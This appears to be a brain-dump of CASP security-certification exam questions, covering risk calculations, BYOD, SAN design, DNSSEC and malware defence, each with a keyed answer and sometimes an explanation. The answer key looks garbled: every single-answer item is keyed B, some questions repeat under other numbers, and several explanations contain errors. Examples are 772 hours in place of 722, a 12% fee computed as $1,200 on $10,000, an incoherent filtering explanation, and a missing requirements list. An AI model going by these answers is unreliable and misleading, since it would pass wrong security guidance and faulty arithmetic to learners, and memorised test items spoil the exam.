QUESTION NO: 454 A company wishes to purchase a new security appliance. A security administrator has extensively researched the appliances, and after presenting security choices to the company's management team, they approve of the proposed solution. Which of the following documents should be constructed to acquire the security appliance? A. SLA B. RFQ C. RFP D. RFI

Answer: B Explanation:

QUESTION NO: 455 News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit network mapping and fingerprinting occurs in preparation for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections, reduce detection time, and minimize any damage that might be done? A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology. B. Implement an application whitelist at all levels of the organization. C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring. D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

Answer: B Explanation:

QUESTION NO: 458 A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for the company? A. Increase the frequency of antivirus downloads and install updates to all workstations. B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections. C. Deploy a NIPS to inspect and block all web traffic which may contain malware and exploits. D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Answer: B Explanation:

QUESTION NO: 459 A security manager has started a new job and has identified that a key application for a new client does not have an accreditation status and is currently not meeting the compliance requirement for the contract's SOW. The security manager has competing priorities and wants to resolve this issue quickly with a system determination and risk assessment. Which of the following approaches presents the MOST risk to the security assessment? A. The security manager reviews the system description for the previous accreditation, but does not review application change records. B. The security manager decides to use the previous SRTM without reviewing the system description. C. The security manager hires an administrator from the previous contract to complete the assessment. D. The security manager does not interview the vendor to determine if the system description is accurate.

Answer: B Explanation:

QUESTION NO: 461 The Chief Information Officer (CIO) is focused on improving IT governance within the organization to reduce system downtime. The CIO has mandated that the following improvements be implemented: -All business units must now identify IT risks and include them in their business risk profiles. -Key controls must be identified and monitored. -Incidents and events must be recorded and reported with management oversight. -Exemptions to the information security policy must be formally recorded, approved, and managed. -IT strategy will be reviewed to ensure it is aligned with the businesses strategy and objectives. In addition to the above, which of the following would BEST help the CIO meet the requirements? A. Establish a register of core systems and identify technical service owners B. Establish a formal change management process C. Develop a security requirement traceability matrix D. Document legacy systems to be decommissioned and the disposal process

Answer: B Explanation:

QUESTION NO: 464 A software development manager is taking over an existing software development project. The team currently suffers from poor communication, and this gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies involves daily stand-ups designed to improve communication? A. Spiral B. Agile C. Waterfall D. Rapid

Answer: B Explanation:

QUESTION NO: 233 In an effort to minimize costs, the management of a small candy company wishes to explore a cloud service option for the development of its online applications. The company does not wish to invest heavily in IT infrastructure. Which of the following solutions should be recommended? A. A public IaaS B. A public PaaS C. A public SaaS D. A private SaaS E. A private IaaS F. A private PaaS

Answer: B Explanation: To develop online applications, you need a platform (a computer or virtual machine) to develop and test the application on. For this you would use a PaaS (Platform as a Service) offering. A public PaaS is cheaper than a private PaaS because the underlying hardware is shared by multiple customers. This is different to a private PaaS offering where the cloud provider hosts hardware dedicated for use by a single customer. PaaS can be defined as a computing platform that allows the creation of web applications quickly and easily and without the complexity of buying and maintaining the software and infrastructure underneath it. PaaS is analogous to SaaS except that, rather than being software delivered over the web, it is a platform for the creation of software, delivered over the web. There are a number of different takes on what constitutes PaaS but some basic characteristics include:

QUESTION NO: 186 A trucking company delivers products all over the country. The executives at the company would like to have better insight into the location of their drivers to ensure the shipments are following secure routes. Which of the following would BEST help the executives meet this goal? A. Install GSM tracking on each product for end-to-end delivery visibility. B. Implement geo-fencing to track products. C. Require drivers to geo-tag documentation at each delivery location. D. Equip each truck with an RFID tag for location services.

Answer: B Explanation: A Geo-fencing solution would use GPS to track the vehicles and could be configured to inform the executives where the vehicles are. Geo-fencing is a feature in a software program that uses the global positioning system (GPS) or radio frequency identification (RFID) to define geographical boundaries. A geo-fence is a virtual barrier. Programs that incorporate geo-fencing allow an administrator to set up triggers so when a device enters (or exits) the boundaries defined by the administrator, a text message or email alert is sent. Many geo-fencing applications incorporate Google Earth, allowing administrators to define boundaries on top of a satellite view of a specific geographical area. Other applications define boundaries by longitude and latitude or through user-created and Web-based maps.

QUESTION NO: 234 A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management. The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for this scenario? A. Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a two-way trust. B. Deploy a corporate Read-Only Domain Controller to the branch location. C. Deploy a corporate Domain Controller in the DMZ at the main campus. D. Deploy a branch location Read-Only Domain Controller to the branch office location with a oneway trust. E. Deploy a corporate Domain Controller to the branch location. F. Deploy a branch location Domain Controller to the branch location with a one-way trust.

Answer: B Explanation: A read-only domain controller (RODC) is a new type of domain controller in the Windows Server® 2008 operating system. With an RODC, organizations can easily deploy a domain controller in locations where physical security cannot be guaranteed. An RODC hosts read-only partitions of the Active Directory® Domain Services (AD DS) database. Before the release of Windows Server 2008, if users had to authenticate with a domain controller over a wide area network (WAN), there was no real alternative. In many cases, this was not an efficient solution. Branch offices often cannot provide the adequate physical security that is required for a writable domain controller. Furthermore, branch offices often have poor network bandwidth when they are connected to a hub site. This can increase the amount of time that is required to log on. It can also hamper access to network resources. Beginning with Windows Server 2008, an organization can deploy an RODC to address these problems. As a result, users in this situation can receive the following benefits:

QUESTION NO: 107 There have been some failures of the company's internal facing website. A security engineer has found the WAF to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month's performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month? A. 92.24 percent B. 98.06 percent C. 98.34 percent D. 99.72 percent

Answer: B Explanation: A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. 14h of down time in a period of 772 supposed uptime = 100 - (14/772 x 100) = 100 - (1.94) = 98.06% References: Gregg, Michael, and Billy Haines, CASP CompTIA Advanced Security Practitioner Study Guide, John Wiley & Sons, Indianapolis, 2012, pp. 43, 116

QUESTION NO: 152 A security engineer is working on a large software development project. As part of the design of the project, various stakeholder requirements were gathered and decomposed to an implementable and testable level. Various security requirements were also documented. Organize the following security requirements into the correct hierarchy required for an SRTM. Requirement 1: The system shall provide confidentiality for data in transit and data at rest. Requirement 2: The system shall use SSL, SSH, or SCP for all data transport. Requirement 3: The system shall implement a file-level encryption scheme. Requirement 4: The system shall provide integrity for all data at rest. Requirement 5: The system shall perform CRC checks on all files. A. Level 1: Requirements 1 and 4; Level 2: Requirements 2, 3, and 5 B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4 C. Level 1: Requirements 1 and 4; Level 2: Requirement 2 under 1, Requirement 5 under 4; Level 3: Requirement 3 under 2 D. Level 1: Requirements 1, 2, and 3; Level 2: Requirements 4 and 5

Answer: B Explanation: Confidentiality and integrity are two of the key facets of data security. Confidentiality ensures that sensitive information is not disclosed to unauthorized users; while integrity ensures that data is not altered by unauthorized users. These are Level 1 requirements. Confidentiality is enforced through encryption of data at rest, encryption of data in transit, and access control. Encryption of data in transit is accomplished by using secure protocols such as PSec, SSL, PPTP, SSH, and SCP, etc. Integrity can be enforced through hashing, digital signatures and CRC checks on the files. In the SRTM hierarchy, the enforcement methods would fall under the Level requirement. References: Gregg, Michael, and Billy Haines, CASP CompTIA Advanced Security Practitioner Study Guide, John Wiley & Sons, Indianapolis, 2012, pp. 17-19, 20, 27-29

QUESTION NO: 118 News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections? A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology. B. Implement an application whitelist at all levels of the organization. C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring. D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

Answer: B Explanation: In essence a whitelist screening will ensure that only acceptable applications are passed / or granted access.

QUESTION NO: 221 A port in a fibre channel switch failed, causing a costly downtime on the company's primary website. Which of the following is the MOST likely cause of the downtime? A. The web server iSCSI initiator was down. B. The web server was not multipathed. C. The SAN snapshots were not up-to-date. D. The SAN replication to the backup site failed.

Answer: B Explanation: In this question, we only have one path to the Fibre Channel storage that provides the storage for the company website. The path failed due to a switch port failure so the storage was unavailable. We can prevent this happening by configuring multiple paths to the storage. If one path fails, other paths are used. In computer storage, multipath I/O is a fault-tolerance and performance-enhancement technique that defines more than one physical path between the CPU in a computer system and its massstorage devices through the buses, controllers, switches, and bridge devices connecting them. As an example, a SCSI hard disk drive may connect to two SCSI controllers on the same computer, or a disk may connect to two Fibre Channel ports. Should one controller, port or switch fail, the operating system can route the I/O through the remaining controller, port or switch transparently and with no changes visible to the applications.

QUESTION NO: 164 A company has issued a new mobile device policy permitting BYOD and company-issued devices. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. The policy states that, "BYOD clients must meet the company's infrastructure requirements to permit a connection." The company also issues a memorandum separate from the policy, which provides instructions for the purchase, installation, and use of the middleware client on BYOD. Which of the following is being described? A. Asset management B. IT governance C. Change management D. Transference of risk

Answer: B Explanation: It governance is aimed at managing information security risks. It entails educating users about risk and implementing policies and procedures to reduce risk.

QUESTION NO: 185 A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements: Requirement 1 - Ensure their server infrastructure operating systems are at their latest patch levels Requirement 2 - Test the behavior between the application and database Requirement 3 - Ensure that customer data cannot be exfiltrated Which of the following is the BEST solution to meet the above requirements? A. Penetration test, perform social engineering and run a vulnerability scanner B. Perform dynamic code analysis, penetration test and run a vulnerability scanner C. Conduct network analysis, dynamic code analysis, and static code analysis D. Run a protocol analyzer perform static code analysis and vulnerability assessment

Answer: B Explanation: Requirement 1: To ensure their server infrastructure operating systems are at their latest patch levels, we can run a vulnerability scanner. A vulnerability scanner is software designed to assess computers, computer systems, networks or applications for weaknesses. This includes ensuring the latest patches are installed. Requirement 2: To test the behavior between the application and database, we can perform dynamic code analysis. Dynamic analysis is the testing and evaluation of a program by executing data in real-time. The objective is to find errors in a program while it is running, rather than by repeatedly examining the code offline. Requirement 3: To ensure that customer data cannot be exfiltrated, we can run a penetration test. A penetration test is used to test for vulnerabilities to exploit to gain access to systems. If a malicious user can access a system, the user can exfiltrate the data.

QUESTION NO: 142 A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the system's SLE? A. $2,000 B. $8,000 C. $12,000 D. $32,000

Answer: B Explanation: Single Loss Expectancy (SLE) is mathematically expressed as: Asset value (AV) x Exposure Factor (EF) SLE = AV x EF = $100,000 x 8% = $ 8,000 References: http://www.financeformulas.net/Return_on_Investment.html https://en.wikipedia.org/wiki/Risk_assessment

QUESTION NO: 117 The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs an effective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make? A. Social media is an effective solution because it is easily adaptable to new situations. B. Social media is an ineffective solution because the policy may not align with the business. C. Social media is an effective solution because it implements SSL encryption. D. Social media is an ineffective solution because it is not primarily intended for business applications.

Answer: B Explanation: Social media networks are designed to draw people's attention quickly and to connect people is thus the main focus; security is not the main concern. Thus the CEO should decide that it would be ineffective to use social media in the company as it does not align with the company business.

QUESTION NO: 138 The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years, but that this year's growth has slowed to around 7%. Over the same time period, the number of attacks against applications has decreased or stayed flat each year. At the start of the measure period, the incidence of PC boot loader or BIOS based attacks was negligible. Starting two years ago, the growth in the number of PC boot loader attacks has grown exponentially. Analysis of these trends would seem to suggest which of the following strategies should be employed? A. Spending on SCADA protections should stay steady; application control spending should increase substantially and spending on PC boot loader controls should increase substantially. B. Spending on SCADA security controls should stay steady; application control spending should decrease slightly and spending on PC boot loader protections should increase substantially. C. Spending all controls should increase by 15% to start; spending on application controls should be suspended, and PC boot loader protection research should increase by 100%. D. Spending on SCADA security controls should increase by 15%; application control spending should increase slightly, and spending on PC boot loader protections should remain steady.

Answer: B Explanation: Spending on the security controls should stay steady because the attacks are still ongoing albeit reduced in occurrence Due to the incidence of BIOS-based attacks growing exponentially as the application attacks being decreased or staying flat spending should increase in this field.

QUESTION NO: 116 A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news? A. Update company policies and procedures B. Subscribe to security mailing lists C. Implement security awareness training D. Ensure that the organization vulnerability management plan is up-to-date

Answer: B Explanation: Subscribing to bug and vulnerability, security mailing lists is a good way of staying abreast and keeping up to date with the latest in those fields.

QUESTION NO: 173 A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a user's age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring. Which of the following is the MOST likely situation that has occurred? A. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Improper error handling prevented the application from recovering. B. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error handling prevented the application from recovering. C. Computers are able to store numbers well above "billions" in size. Therefore, the website issues are not related to the large number being input. D. The application has crashed because a very large integer has led to a "divide by zero". Improper error handling prevented the application from recovering.

Answer: B Explanation: The age variable was configured to expect a number (an age); probably a number less than 100... or three digits. If someone entered a very large number (billions) with many digits, an integer overflow can occur which can cause the value to recorded as a negative number. In computer programming, an integer overflow occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space. In some situations, a program may make the assumption that a variable always contains a positive value. If the variable has a signed integer type, an overflow can cause its value to wrap and become negative. This overflow violates the program's assumption and may lead to unintended behavior.

QUESTION NO: 150 An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting data leakage. Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000. The web filtering solution will cost the organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event after implementing the web filtering solution? A. $0 B. $7,500 C. $10,000 D. $12,500 E. $15,000

Answer: B Explanation: The annualized loss expectancy (ALE) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE). It is mathematically expressed as: ALE = ARO x SLE Single Loss Expectancy (SLE) is mathematically expressed as: Asset value (AV) x Exposure Factor (EF) SLE = AV x EF - Thus the Single Loss Expectancy (SLE) = ALE/ARO = $15,000 / 2 = $ 7,500 References: http://www.financeformulas.net/Return_on_Investment.html https://en.wikipedia.org/wiki/Risk_assessment

QUESTION NO: 177 An organization recently upgraded its wireless infrastructure to support 802.1x and requires all clients to use this method. After the upgrade, several critical wireless clients fail to connect because they are only pre-shared key compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them into compliance with the 802.1x requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network? A. Create a separate SSID and require the use of dynamic encryption keys. B. Create a separate SSID with a pre-shared key to support the legacy clients and rotate the key at random intervals. C. Create a separate SSID and pre-shared WPA2 key on a new network segment and only allow required communication paths. D. Create a separate SSID and require the legacy clients to connect to the wireless network using certificate-based 802.1x.

Answer: B Explanation: The legacy wireless clients only support pre-shared keys and do not use an authentication server. Instead, the pre-shared key (PSK) is shared between the clients and the wireless access point using a secure channel before it needs to be used. To improve security, pre-shared keys should be changed at a regular basis.

QUESTION NO: 235 An IT manager is working with a project manager from another subsidiary of the same multinational organization. The project manager is responsible for a new software development effort that is being outsourced overseas, while customer acceptance testing will be performed in house. Which of the following capabilities is MOST likely to cause issues with network availability? A. Source code vulnerability scanning B. Time-based access control lists C. ISP to ISP network jitter D. File-size validation E. End to end network encryption

Answer: B Explanation: The new software development effort is being outsourced overseas. Overseas means a different country and therefore a different time zone. Time-based access control lists allow access to resources only at defined times, for example: during office hours. If time-based access control lists are used at the overseas location while customer acceptance testing will be performed in house, it is likely that the testing would be performed at a time which is not allowed by the time-based access control lists. Time-based ACLs are types of control lists that allow for network access based on time or day. Its function is similar to that of the extended ACLs. Time-based ACLs is implemented by creating a time range that defines specific times of the day and week. This time range created have to be identified with a specific name and then refer to it by a function. The time restrictions are imposed on the function itself. Time-based ACLs are especially useful when you want to place restriction(s) on inbound or outbound traffic based on the time of day. For example, you might apply time-based ACLs if you wanted to only allow access to the Internet during a particular time of the day or allow access to a particular server only during work hours. The time range relies on the router system clock.

QUESTION NO: 205 The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system? A. Virtualize the system and migrate it to a cloud provider. B. Segment the device on its own secure network. C. Install an antivirus and HIDS on the system. D. Hire developers to reduce vulnerabilities in the code.

Answer: B Explanation: The question states that the application is a proprietary embedded system and little is documented and known about it. If we don't know much about the application or system, we should not make any changes to the system. The best solution would be to isolate the system by segmenting the device on its own secure network. This will reduce the risk of a compromise of the system without making changes to the system itself.

QUESTION NO: 119 A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for the company? A. Increase the frequency of antivirus downloads and install updates to all workstations. B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections. C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits. D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Answer: B Explanation: The undetected malware gets delivered to the company via drive-by and malware hosing websites. Display filters and Capture filters when deployed on the cloud-based content should provide the protection required.

QUESTION NO: 162 A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble? A. Discuss the issue with the software product's user groups B. Consult the company's legal department on practices and law C. Contact senior finance management and provide background information D. Seek industry outreach for software practices and law

Answer: B Explanation: To ensure that the company stays out of trouble, the sales manager should enquire about the legal ramifications of the change by consulting with the company's legal department, particularly as the marketing material is not being amended.

QUESTION NO: 222 A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. The systems must exchange large amounts of fixed format data such as names, addresses, and phone numbers, as well as occasional chunks of data in unpredictable formats. The developers want to construct a new data format and create custom tools to parse and process the data. The security administrator instead suggests that the developers: A. Create a custom standard to define the data. B. Use well formed standard compliant XML and strict schemas. C. Only document the data format in the parsing application code. D. Implement a de facto corporate standard for all analyzed data.

Answer: B Explanation: To ensure the successful parsing of the data, the XML code containing the data should be wellformed. We can use strict schemas to ensure the correct formatting of the data. XML has two main advantages: first, it offers a standard way of structuring data, and, second, we can specify the vocabulary the data uses. We can define the vocabulary (what elements and attributes an XML document can use) using either a document type definition (DTD) or the XML Schema language. Schemas provide the ability to define an element's type (string, integer, etc.) and much finer constraints (a positive integer, a string starting with an uppercase letter, etc.). DTDs enforce a strict ordering of elements; schemas have a more flexible range of options. Finally schemas are written in XML, whereas DTDs have their own syntax. For an application to accept an XML document, it must be both well formed and valid. A document that is not well formed is not really XML and doesn't conform to the W3C's stipulations for an XML document. A parser will fail when given that document, even if validation is turned off.

QUESTION NO: 197 A finance manager says that the company needs to ensure that the new system can "replay" data, up to the minute, for every exchange being tracked by the investment departments. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance. How would a security engineer BEST interpret the finance manager's needs? A. Compliance standards B. User requirements C. Data elements D. Data storage E. Acceptance testing F. Information digest G. System requirements

Answer: B Explanation: User requirements are used to specify what the USER expects an application or system to do. In this question, the finance manager has stated what he wants the system to do. Therefore, the answer to this question is 'user requirements'.

QUESTION NO: 203 A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via an HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers? A. SSL certificate revocation B. SSL certificate pinning C. Mobile device root-kit detection D. Extended Validation certificates

Answer: B Explanation: Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks. Pinning is the process of associating a host with their expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin. If the certificate or public key is added upon first encounter, you will be using key continuity. Key continuity can fail if the attacker has a privileged position during the first encounter.

QUESTION NO: 172 A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a system compromise from malware. Currently, the company projects a total cost of $50,000 for the next three years responding to and eradicating workstation malware. The Information Security Officer (ISO) has received three quotes from different companies that provide HIPS. The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10% annual support fee based on the number of workstations. The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a 12% annual fee based on the number of workstations. The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee based on the number of workstations. Which solution should the company select if the contract is only valid for three years? A. First quote B. Second quote C. Third quote D. Accept the risk

Answer: B Explanation: We have 2000 workstations and a budget of $50,000 for the next three years. An annual fee of $5 per workstation works out to $10,000 per year. An additional 12% annual support fee adds another $1,200, which makes it $11,200 a year and $33,600 over three years. The $15,000 one-time fee pushes the total up to $48,600 over the tree years.

QUESTION NO: 190 ODBC access to a database on a network-connected host is required. The host does not have a security mechanism to authenticate the incoming ODBC connection, and the application requires that the connection have read/write permissions. In order to further secure the data, a nonstandard configuration would need to be implemented. The information in the database is not sensitive, but was not readily accessible prior to the implementation of the ODBC connection. Which of the following actions should be taken by the security analyst? A. Accept the risk in order to keep the system within the company's standard security configuration. B. Explain the risks to the data owner and aid in the decision to accept the risk versus choosing a nonstandard solution. C. Secure the data despite the need to use a security control or solution that is not within company standards. D. Do not allow the connection to be made to avoid unnecessary risk and avoid deviating from the standard security configuration.

Answer: B Explanation: We need to decide whether to accept the risks associated with a non-standard security solution or to allow the application to have unauthenticated Read/Write access to the data. The data is not sensitive so allowing unauthenticated Read/Write access could be an option but this would make the data readily available. We should let the owner of the data decide whether he wants to allow unauthenticated access or allow only authenticated access but with a non-standard security solution. We should explain the risks of both options so the owner of the data can make an informed decision.

QUESTION NO: 326 An IT administrator wants to restrict DNS zone transfers between two geographically dispersed, external company DNS name servers, and has decided to use TSIG. Which of the following are critical when using TSIG? (Select TWO). A. Periodic key changes once the initial keys are established between the DNS name servers. B. Secure exchange of the key values between the two DNS name servers. C. A secure NTP source used by both DNS name servers to avoid message rejection. D. DNS configuration files on both DNS name servers must be identically encrypted. E. AES encryption with a SHA1 hash must be used to encrypt the configuration files on both DNS name servers.

Answer: B,C Explanation:

QUESTION NO: 204 A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to the domain names and infrastructure. Which of the following security goals does this meet? (Select TWO). A. Availability B. Authentication C. Integrity D. Confidentiality E. Encryption

Answer: B,C Explanation: DNSSEC (short for DNS Security Extensions) adds security to the Domain Name System. The original design of the Domain Name System (DNS) did not include security; instead it was designed to be a scalable distributed system. The Domain Name System Security Extensions (DNSSEC) attempts to add security, while maintaining backwards compatibility. DNSSEC was designed to protect Internet resolvers (clients) from forged DNS data, such as that created by DNS cache poisoning. It is a set of extensions to DNS, which provide to DNS clients (resolvers): All answers in DNSSEC are digitally signed. By checking the digital signature, a DNS resolver is able to check if the information is identical (correct and complete) to the information on the authoritative DNS server. While protecting IP addresses is the immediate concern for many users, DNSSEC can protect other information such as general-purpose cryptographic certificates stored in CERT records in the DNS.

QUESTION NO: 248 A health service provider is considering the impact of allowing doctors and nurses access to the internal email system from their personal smartphones. The Information Security Officer (ISO) has received a technical document from the security administrator explaining that the current email system is capable of enforcing security policies to personal smartphones, including screen lockout and mandatory PINs. Additionally, the system is able to remotely wipe a phone if reported lost or stolen. Which of the following should the Information Security Officer be MOST concerned with based on this scenario? (Select THREE). A. The email system may become unavailable due to overload. B. Compliance may not be supported by all smartphones. C. Equipment loss, theft, and data leakage. D. Smartphone radios can interfere with health equipment. E. Data usage cost could significantly increase. F. Not all smartphones natively support encryption. G. Smartphones may be used as rogue access points.

Answer: B,C,F Explanation:

QUESTION NO: 352 A retail bank has had a number of issues in regards to the integrity of sensitive information across all of its customer databases. This has resulted in the bank's share price decreasing in value by 50% and regulatory intervention and monitoring. The new Chief Information Security Officer (CISO) as a result has initiated a program of work to solve the issues. The business has specified that the solution needs to be enterprise grade and meet the following requirements: In order to solve this problem, which of the following security solutions will BEST meet the above requirements? (Select THREE). A. Implement a security operations center to provide real time monitoring and incident response with self service reporting capability. B. Implement an aggregation based SIEM solution to be deployed on the log servers of the major platforms, applications, and infrastructure. C. Implement a security operations center to provide real time monitoring and incident response and an event correlation dashboard with self service reporting capability. D. Ensure that the network operations center has the tools to provide real time monitoring and incident response and an event correlation dashboard with self service reporting capabilities. E. Implement an agent only based SIEM solution to be deployed on all major platforms, applications, and infrastructures. F. Ensure appropriate auditing is enabled to capture the required information. G. Manually pull the logs from the major platforms, applications, and infrastructures to a central secure server.

Answer: B,C,F Explanation:

QUESTION NO: 299 New zero-day attacks are announced on a regular basis against a broad range of technology systems. Which of the following best practices should a security manager do to manage the risks of these attack vectors? (Select TWO). A. Establish an emergency response call tree. B. Create an inventory of applications. C. Backup the router and firewall configurations. D. Maintain a list of critical systems. E. Update all network diagrams.

Answer: B,D Explanation:

QUESTION NO: 209 A company is deploying a new iSCSI-based SAN. The requirements are as follows: SAN nodes must authenticate each other. Shared keys must NOT be used. Do NOT use encryption in order to gain performance. Which of the following design specifications meet all the requirements? (Select TWO). A. Targets use CHAP authentication B. IPSec using AH with PKI certificates for authentication C. Fiber channel should be used with AES D. Initiators and targets use CHAP authentication E. Fiber channel over Ethernet should be used F. IPSec using AH with PSK authentication and 3DES G. Targets have SCSI IDs for authentication

Answer: B,D Explanation: CHAP (Challenge Handshake Authentication Protocol) is commonly used for iSCSI authentication. Initiators and targets both using CHAP authentication is known as mutual CHAP authentication. Another option is to use IPSec using AH with PKI certificates for authentication. One of the two core security protocols in IPSec is the Authentication Header (AH). This is another protocol whose name has been well chosen: AH is a protocol that provides authentication of either all or part of the contents of a datagram through the addition of a header that is calculated based on the values in the datagram. We can use PKI certificates for authentication rather than shared keys.

QUESTION NO: 213 In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections to the corporate enterprise from personal devices; provided they are on an approved device list. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO). A. Provide free email software for personal devices. B. Encrypt data in transit for remote access. C. Require smart card authentication for all devices. D. Implement NAC to limit insecure devices access. E. Enable time of day restrictions for personal devices.

Answer: B,D Explanation: In this question, we are allowing access to email and remote connections to the corporate enterprise from personal devices. When providing remote access to corporate systems, you should always ensure that data traveling between the corporate network and the remote device is encrypted. We need to provide access to devices only if they are on an approved device list. Therefore, we need a way to check the device before granting the device access to the network if it is an approved device. For this we can use NAC (Network Access Control). When a computer connects to a computer network, it is not permitted to access anything unless it complies with a business defined policy; including anti-virus protection level, system update level and configuration. While the computer is being checked by a pre-installed software agent, it can only access resources that can remediate (resolve or update) any issues. Once the policy is met, the computer is able to access network resources and the Internet, within the policies defined within the NAC system. NAC solutions allow network operators to define policies, such as the types of computers or roles of users allowed to access areas of the network, and enforce them in switches, routers, and network middleboxes.

QUESTION NO: 189 The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer needed. Additionally, the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Which of the following should be implemented to ensure these processes can be automated? (Select THREE). A. SIM's PIN B. Remote wiping C. Chargeback system D. MDM software E. Presence software F. Email profiles G. Identity attestation H. GPS tracking

Answer: B,D,G Explanation: In identity management, onboarding is the addition of a new employee to an organization's identity and access management (IAM) system. The term is also used if an employee changes roles within the organization and is granted new or expanded access privileges. Conversely, offboarding refers to the IAM processes surrounding the removal of an identity for an employee who has left the organization. Mobile device management (MDM) is a type of security software used by an IT department to monitor, manage and secure employees' mobile devices that are deployed across multiple mobile service providers and across multiple mobile operating systems being used in the organization. Remote wiping is a function of MDM software that enables an administrator to remotely wipe data from a mobile device usually be resetting the device back to its factory default settings. Identity attestation is used to prove one's identity by using third party trusted authentication providers.

QUESTION NO: 363 A security code reviewer has been engaged to manually review a legacy application. A number of systemic issues have been uncovered relating to buffer overflows and format string vulnerabilities. The reviewer has advised that future software projects utilize managed code platforms if at all possible. Which of the following languages would suit this recommendation? (Select TWO). A. C B. C# C. C++ D. Perl E. Java

Answer: B,E Explanation:

QUESTION NO: 382 Two storage administrators are discussing which SAN configurations will offer the MOST confidentiality. Which of the following configurations would the administrators use? (Select TWO). A. Deduplication B. Zoning C. Snapshots D. Multipathing E. LUN masking

Answer: B,E Explanation:

